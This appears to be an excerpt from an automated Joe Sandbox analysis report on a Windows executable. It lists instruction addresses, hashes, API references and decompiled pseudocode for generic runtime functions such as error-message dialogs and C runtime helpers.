                                                                                                                                                                                                                              0x7ff735c4d7ce
                                                                                                                                                                                                                              0x7ff735c4d7d8
                                                                                                                                                                                                                              0x7ff735c4d7e6
                                                                                                                                                                                                                              0x7ff735c4d7f0
                                                                                                                                                                                                                              0x7ff735c4d7f4
                                                                                                                                                                                                                              0x7ff735c4d800
                                                                                                                                                                                                                              0x7ff735c4d808
                                                                                                                                                                                                                              0x7ff735c4d811
                                                                                                                                                                                                                              0x7ff735c4d817
                                                                                                                                                                                                                              0x7ff735c4d823
                                                                                                                                                                                                                              0x7ff735c4d828
                                                                                                                                                                                                                              0x7ff735c4d82f
                                                                                                                                                                                                                              0x7ff735c4d831
                                                                                                                                                                                                                              0x7ff735c4d839
                                                                                                                                                                                                                              0x7ff735c4d843
                                                                                                                                                                                                                              0x7ff735c4d84d
                                                                                                                                                                                                                              0x7ff735c4d858
                                                                                                                                                                                                                              0x7ff735c4d85d
                                                                                                                                                                                                                              0x7ff735c4d866
                                                                                                                                                                                                                              0x7ff735c4d874
                                                                                                                                                                                                                              0x7ff735c4d876
                                                                                                                                                                                                                              0x7ff735c4d87a
                                                                                                                                                                                                                              0x7ff735c4d87c
                                                                                                                                                                                                                              0x7ff735c4d888
                                                                                                                                                                                                                              0x7ff735c4d896
                                                                                                                                                                                                                              0x7ff735c4d8a4
                                                                                                                                                                                                                              0x7ff735c4d8b0
                                                                                                                                                                                                                              0x7ff735c4d8b6
                                                                                                                                                                                                                              0x7ff735c4d8bf
                                                                                                                                                                                                                              0x7ff735c4d8c1
                                                                                                                                                                                                                              0x7ff735c4d8c9
                                                                                                                                                                                                                              0x7ff735c4d8cb
                                                                                                                                                                                                                              0x7ff735c4d8de
                                                                                                                                                                                                                              0x7ff735c4d8eb
                                                                                                                                                                                                                              0x7ff735c4d8fd
                                                                                                                                                                                                                              0x7ff735c4d90c
                                                                                                                                                                                                                              0x7ff735c4d913
                                                                                                                                                                                                                              0x7ff735c4d918
                                                                                                                                                                                                                              0x7ff735c4d91e
                                                                                                                                                                                                                              0x7ff735c4d92b
                                                                                                                                                                                                                              0x7ff735c4d93d
                                                                                                                                                                                                                              0x7ff735c4d94b
                                                                                                                                                                                                                              0x7ff735c4d94f
                                                                                                                                                                                                                              0x7ff735c4d954
                                                                                                                                                                                                                              0x7ff735c4d978

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                              • API String ID: 851805269-3733052814
                                                                                                                                                                                                                              • Opcode ID: 9d9d6767a0d35d05cbe24d87e3edf5639f808be3958287787c2b02243efe83bd
                                                                                                                                                                                                                              • Instruction ID: 8f7701e1ca18f4d8e4af550e204d77d20e0cd7eda420d35926e1640c2fd9e881
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d9d6767a0d35d05cbe24d87e3edf5639f808be3958287787c2b02243efe83bd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0361B1B3908253A6EB21BB21906077CB7A2EB54F98F8A4135DA8D87795CF3CE490D750
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C422F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 60%
                                                                                                                                                                                                                              			E00007FF77FF735C422F0(void* __ebx, void* __rax, void* __rcx, void* __rdx, void* __r8) {
				void* __rbx;
				void* __rsi;
				void* __rbp;
				struct HINSTANCE__* _t29;
				signed long long _t55;
				signed long long _t56;
				void* _t58;
				long long _t61;
				void* _t77;
				void* _t79;
				void* _t80;
				signed long long _t81;
				void* _t85;
				void* _t87;
				void* _t88;
				void* _t89;

				_t75 = __rdx;
				_t79 = _t80 - 0x20d0;
				E00007FF77FF735C4A3B0(0x21d0, __rax, _t87, _t88);
				_t81 = _t80 - __rax;
				_t55 =  *0x35c7b008; // 0x861d85c91f07
				_t56 = _t55 ^ _t81;
				 *(_t79 + 0x20c0) = _t56;
				_t58 = __rcx;
				_t89 = __r8;
				_t77 = __rdx;
				_t29 = GetModuleHandleW(??);
				_t61 = _t79 + 0x1fb6;
				r8d = 0x102;
				E00007FF77FF735C4B800(_t29, 0, _t61, __rdx, __r8);
				 *((intOrPtr*)(_t79 + 0x1fa0)) = 0x90cc0884;
				 *((long long*)(_t79 + 0x1fa4)) = _t61;
				 *((short*)(_t79 + 0x1fb4)) = 0;
				 *((intOrPtr*)(_t79 + 0x1fac)) = 0xc80000;
				 *((intOrPtr*)(_t79 + 0x1fb0)) = 0x96;
				E00007FF77FF735C42520(_t56, _t79 + 0x1fb6, __rdx, L"Unhandled exception in script", _t85);
				 *(_t81 + 0x38) = _t56;
				r8d = 0x2040;
				E00007FF77FF735C4B800(0, 0, _t81 + 0x58, _t75, L"Unhandled exception in script");
				 *(_t81 + 0x30) = _t56;
				E00007FF77FF735C586E0(_t56, _t58, _t58, _t56, _t79);
				 *(_t81 + 0x40) = _t56;
				E00007FF77FF735C586E0(_t56, _t58, _t77, _t56, _t79);
				 *(_t81 + 0x48) = _t56;
				E00007FF77FF735C586E0(_t56, _t58, _t89, _t56, _t79);
				 *(_t81 + 0x50) = _t56;
				r8d = 0;
				 *((long long*)(_t81 + 0x20)) = _t81 + 0x30;
				DialogBoxIndirectParamW(??, ??, ??, ??, ??);
				E00007FF77FF735C5377C(0,  *(_t81 + 0x40), _t79 + 0x1fa0, L"Unhandled exception in script");
				E00007FF77FF735C5377C(0,  *(_t81 + 0x48), _t79 + 0x1fa0, L"Unhandled exception in script");
				E00007FF77FF735C5377C(0,  *(_t81 + 0x50), _t79 + 0x1fa0, L"Unhandled exception in script");
				if ( *((intOrPtr*)(_t79 + 0x1f78)) == 0) goto 0x35c42425;
				DeleteObject(??);
				if ( *((intOrPtr*)(_t79 + 0x1f80)) == 0) goto 0x35c42437;
				DestroyIcon(??);
				return E00007FF77FF735C4A410(__ebx, 0,  *(_t79 + 0x20c0) ^ _t81);
			}



















                                                                                                                                                                                                                              0x7ff735c422f0
                                                                                                                                                                                                                              0x7ff735c422f7
                                                                                                                                                                                                                              0x7ff735c42304
                                                                                                                                                                                                                              0x7ff735c42309
                                                                                                                                                                                                                              0x7ff735c4230c
                                                                                                                                                                                                                              0x7ff735c42313
                                                                                                                                                                                                                              0x7ff735c42316
                                                                                                                                                                                                                              0x7ff735c4231d
                                                                                                                                                                                                                              0x7ff735c42320
                                                                                                                                                                                                                              0x7ff735c42325
                                                                                                                                                                                                                              0x7ff735c42328
                                                                                                                                                                                                                              0x7ff735c42330
                                                                                                                                                                                                                              0x7ff735c42337
                                                                                                                                                                                                                              0x7ff735c42340
                                                                                                                                                                                                                              0x7ff735c42347
                                                                                                                                                                                                                              0x7ff735c42351
                                                                                                                                                                                                                              0x7ff735c4235f
                                                                                                                                                                                                                              0x7ff735c42366
                                                                                                                                                                                                                              0x7ff735c42373
                                                                                                                                                                                                                              0x7ff735c42384
                                                                                                                                                                                                                              0x7ff735c42392
                                                                                                                                                                                                                              0x7ff735c42397
                                                                                                                                                                                                                              0x7ff735c4239d
                                                                                                                                                                                                                              0x7ff735c423a5
                                                                                                                                                                                                                              0x7ff735c423aa
                                                                                                                                                                                                                              0x7ff735c423b2
                                                                                                                                                                                                                              0x7ff735c423b7
                                                                                                                                                                                                                              0x7ff735c423bf
                                                                                                                                                                                                                              0x7ff735c423c4
                                                                                                                                                                                                                              0x7ff735c423c9
                                                                                                                                                                                                                              0x7ff735c423da
                                                                                                                                                                                                                              0x7ff735c423e4
                                                                                                                                                                                                                              0x7ff735c423ec
                                                                                                                                                                                                                              0x7ff735c423fa
                                                                                                                                                                                                                              0x7ff735c42404
                                                                                                                                                                                                                              0x7ff735c4240e
                                                                                                                                                                                                                              0x7ff735c4241d
                                                                                                                                                                                                                              0x7ff735c4241f
                                                                                                                                                                                                                              0x7ff735c4242f
                                                                                                                                                                                                                              0x7ff735c42431
                                                                                                                                                                                                                              0x7ff735c42455

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                              • String ID: Unhandled exception in script
                                                                                                                                                                                                                              • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                              • Opcode ID: db6a7fd169cccdbc3120d56fb811144cb4435f25d5e37ef9c8d91375d45a5da9
                                                                                                                                                                                                                              • Instruction ID: 94b4148d9eb44f4c1184de2b4367702fef3fe5cea2103de04e625ca29d13316a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db6a7fd169cccdbc3120d56fb811144cb4435f25d5e37ef9c8d91375d45a5da9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F316DB3A08A8399EB21EF61E8555FAE361FF88B88F840135EA4D47A55DF3CD104D720
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C426D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67windowCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 56%
                                                                                                                                                                                                                              			E00007FF77FF735C426D0(void* __eflags, void* __rax, long long __rcx, signed long long __rdx, long long __r8, long long __r9, long long _a8, signed long long _a16, char _a24, long long _a32, char _a1048, char _a2072, char _a4120, signed int _a6168, intOrPtr _a6224, char _a6232) {
				void* __rbx;
				void* __rsi;
				void* _t28;
				void* _t41;
				void* _t42;
				signed long long _t47;
				signed long long _t48;
				long long _t49;
				long long _t65;
				void* _t67;
				void* _t77;
				void* _t78;

				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				E00007FF77FF735C4A3B0(0x1840, __rax, _t77, _t78);
				_t68 = _t67 - __rax;
				_t47 =  *0x35c7b008; // 0x861d85c91f07
				_t48 = _t47 ^ _t67 - __rax;
				_a6168 = _t48;
				_t65 = __rcx;
				E00007FF77FF735C41040(GetLastError());
				_a16 =  &_a6232;
				r8d = 0x400;
				_a8 = 0;
				E00007FF77FF735C532C4(_t41, _t42,  *_t48 | 0x00000002,  &_a1048, __r8, _a6224);
				E00007FF77FF735C46DD0(_t24, _t48, __r8);
				_a16 = _t48;
				_a8 = _t65;
				_t28 = E00007FF77FF735C41BE0(_t48,  &_a24,  &_a1048, "%s%s: %s",  &_a1048);
				r8d = 0x800;
				E00007FF77FF735C4B800(_t28, 0,  &_a2072,  &_a1048, "%s%s: %s");
				r8d = 0x400;
				E00007FF77FF735C47250(_t48, _t49,  &_a4120,  &_a24,  &_a6232, "%s%s: %s");
				if (_t48 == 0) goto 0x35c427e4;
				r8d = 0x400;
				E00007FF77FF735C47250(_t48, _t49,  &_a2072, "Fatal error detected",  &_a6232, "%s%s: %s");
				r9d = 0x30;
				MessageBoxW(??, ??, ??, ??);
				goto 0x35c427fe;
				r9d = 0x30;
				return E00007FF77FF735C4A410(MessageBoxA(??, ??, ??, ??), 0, _a6168 ^ _t68);
			}















                                                                                                                                                                                                                              0x7ff735c426d0
                                                                                                                                                                                                                              0x7ff735c426d5
                                                                                                                                                                                                                              0x7ff735c426da
                                                                                                                                                                                                                              0x7ff735c426e7
                                                                                                                                                                                                                              0x7ff735c426ec
                                                                                                                                                                                                                              0x7ff735c426ef
                                                                                                                                                                                                                              0x7ff735c426f6
                                                                                                                                                                                                                              0x7ff735c426f9
                                                                                                                                                                                                                              0x7ff735c42701
                                                                                                                                                                                                                              0x7ff735c42714
                                                                                                                                                                                                                              0x7ff735c42729
                                                                                                                                                                                                                              0x7ff735c4272e
                                                                                                                                                                                                                              0x7ff735c42734
                                                                                                                                                                                                                              0x7ff735c42744
                                                                                                                                                                                                                              0x7ff735c4274b
                                                                                                                                                                                                                              0x7ff735c42750
                                                                                                                                                                                                                              0x7ff735c42764
                                                                                                                                                                                                                              0x7ff735c42773
                                                                                                                                                                                                                              0x7ff735c42782
                                                                                                                                                                                                                              0x7ff735c42788
                                                                                                                                                                                                                              0x7ff735c4278d
                                                                                                                                                                                                                              0x7ff735c427a0
                                                                                                                                                                                                                              0x7ff735c427a8
                                                                                                                                                                                                                              0x7ff735c427aa
                                                                                                                                                                                                                              0x7ff735c427bf
                                                                                                                                                                                                                              0x7ff735c427c4
                                                                                                                                                                                                                              0x7ff735c427dc
                                                                                                                                                                                                                              0x7ff735c427e2
                                                                                                                                                                                                                              0x7ff735c427e4
                                                                                                                                                                                                                              0x7ff735c42818

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF735C47063,?,?,?,?,?,?,?,?,?,?,?,00007FF735C4101D), ref: 00007FF735C42704
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C46DD0: GetLastError.KERNEL32(00000000,00007FF735C42750), ref: 00007FF735C46DF7
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C46DD0: FormatMessageW.KERNEL32(00000000,00007FF735C42750), ref: 00007FF735C46E26
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C47250: MultiByteToWideChar.KERNEL32 ref: 00007FF735C4728A
                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF735C427DC
                                                                                                                                                                                                                              • MessageBoxA.USER32 ref: 00007FF735C427F8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                                                                                                                              • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                                              • API String ID: 2806210788-2410924014
                                                                                                                                                                                                                              • Opcode ID: eb5025133ce12851dc68569d1829b1cadf31ed2c852c922d6433b8ab103b4a03
                                                                                                                                                                                                                              • Instruction ID: 2c31f3f2cf9106268487ef6f6d33fc460f39dbb4e440d9a1fb0fb1a41b61c5d0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb5025133ce12851dc68569d1829b1cadf31ed2c852c922d6433b8ab103b4a03
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F03165B3628693A1E631AB10E4517EAE365FB84F88F805136E68D06A99DF3CD305D750
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C57EEC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                              • Opcode ID: a4dd23be583c2ca77ea296aa1a49e31431da794591d051253c6cb6b303438496
                                                                                                                                                                                                                              • Instruction ID: a5d8bbe0005db356d9ba5ba96d5f9a5ea1f73a89e2b671ed5dafeee0f214044c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4dd23be583c2ca77ea296aa1a49e31431da794591d051253c6cb6b303438496
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1DF0A4A261860391EA10AB21E444335E370AF48FA9F981735D66D461E4CF2CD145D320
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C679DC Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                                                                                              			E00007FF77FF735C679DC(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t46;
				void* _t51;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0x35c67a0e;
				if (sil >= 0) goto 0x35c67a0e;
				E00007FF77FF735C68174(_t27, _t51);
				_t28 = _t27 & 0xfffffff7;
				goto 0x35c67a65;
				_t42 = 0x00000004 & dil;
				if (_t42 == 0) goto 0x35c67a29;
				asm("dec eax");
				if (_t42 >= 0) goto 0x35c67a29;
				E00007FF77FF735C68174(_t28, _t51);
				_t29 = _t28 & 0xfffffffb;
				goto 0x35c67a65;
				_t43 = dil & 0x00000001;
				if (_t43 == 0) goto 0x35c67a45;
				asm("dec eax");
				if (_t43 >= 0) goto 0x35c67a45;
				E00007FF77FF735C68174(_t29, _t51);
				_t30 = _t29 & 0xfffffffe;
				goto 0x35c67a65;
				_t44 = dil & 0x00000002;
				if (_t44 == 0) goto 0x35c67a65;
				asm("dec eax");
				if (_t44 >= 0) goto 0x35c67a65;
				if ((dil & 0x00000010) == 0) goto 0x35c67a62;
				E00007FF77FF735C68174(_t30, _t51);
				_t31 = _t30 & 0xfffffffd;
				_t46 = dil & 0x00000010;
				if (_t46 == 0) goto 0x35c67a7f;
				asm("dec eax");
				if (_t46 >= 0) goto 0x35c67a7f;
				E00007FF77FF735C68174(_t31, _t51);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}













                                                                                                                                                                                                                              0x7ff735c679dc
                                                                                                                                                                                                                              0x7ff735c679e1
                                                                                                                                                                                                                              0x7ff735c679f0
                                                                                                                                                                                                                              0x7ff735c679f8
                                                                                                                                                                                                                              0x7ff735c679fd
                                                                                                                                                                                                                              0x7ff735c67a04
                                                                                                                                                                                                                              0x7ff735c67a09
                                                                                                                                                                                                                              0x7ff735c67a0c
                                                                                                                                                                                                                              0x7ff735c67a13
                                                                                                                                                                                                                              0x7ff735c67a16
                                                                                                                                                                                                                              0x7ff735c67a18
                                                                                                                                                                                                                              0x7ff735c67a1d
                                                                                                                                                                                                                              0x7ff735c67a1f
                                                                                                                                                                                                                              0x7ff735c67a24
                                                                                                                                                                                                                              0x7ff735c67a27
                                                                                                                                                                                                                              0x7ff735c67a29
                                                                                                                                                                                                                              0x7ff735c67a2d
                                                                                                                                                                                                                              0x7ff735c67a2f
                                                                                                                                                                                                                              0x7ff735c67a34
                                                                                                                                                                                                                              0x7ff735c67a3b
                                                                                                                                                                                                                              0x7ff735c67a40
                                                                                                                                                                                                                              0x7ff735c67a43
                                                                                                                                                                                                                              0x7ff735c67a45
                                                                                                                                                                                                                              0x7ff735c67a49
                                                                                                                                                                                                                              0x7ff735c67a4b
                                                                                                                                                                                                                              0x7ff735c67a50
                                                                                                                                                                                                                              0x7ff735c67a56
                                                                                                                                                                                                                              0x7ff735c67a5d
                                                                                                                                                                                                                              0x7ff735c67a62
                                                                                                                                                                                                                              0x7ff735c67a65
                                                                                                                                                                                                                              0x7ff735c67a69
                                                                                                                                                                                                                              0x7ff735c67a6b
                                                                                                                                                                                                                              0x7ff735c67a70
                                                                                                                                                                                                                              0x7ff735c67a77
                                                                                                                                                                                                                              0x7ff735c67a95

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                              • Opcode ID: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                                                                                                                              • Instruction ID: eabe5774b4297fa10aae920ee3d46d5708f09eaae40811c7e24fd1562e6947f8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1411512BE1CA0321F6A43528D546375D1C16F55F7CF9D6F38EA6E063DB8E2CAB816120
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C59EA0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF735C590BF,?,?,00000000,00007FF735C5935A,?,?,?,?,?,00007FF735C5194E), ref: 00007FF735C59EBF
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF735C590BF,?,?,00000000,00007FF735C5935A,?,?,?,?,?,00007FF735C5194E), ref: 00007FF735C59EDE
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF735C590BF,?,?,00000000,00007FF735C5935A,?,?,?,?,?,00007FF735C5194E), ref: 00007FF735C59F06
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF735C590BF,?,?,00000000,00007FF735C5935A,?,?,?,?,?,00007FF735C5194E), ref: 00007FF735C59F17
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF735C590BF,?,?,00000000,00007FF735C5935A,?,?,?,?,?,00007FF735C5194E), ref: 00007FF735C59F28
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                              • Opcode ID: 0cdcc05125c37c811a13dceb0bb6179f6339a71caec19357d1775ad7d868b7af
                                                                                                                                                                                                                              • Instruction ID: a24a1e6b4ed5083ea634243212376958986383fe8a4f9b0df940c63cc3697b1d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0cdcc05125c37c811a13dceb0bb6179f6339a71caec19357d1775ad7d868b7af
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E111A2A6A0830321FA5473B39651179D2A59F40FE8FD41BB4F83E467DADE2CA501E320
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C59D34 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF735C6198B,?,?,?,00007FF735C5C200,?,?,00000000,00007FF735C5313F), ref: 00007FF735C59D45
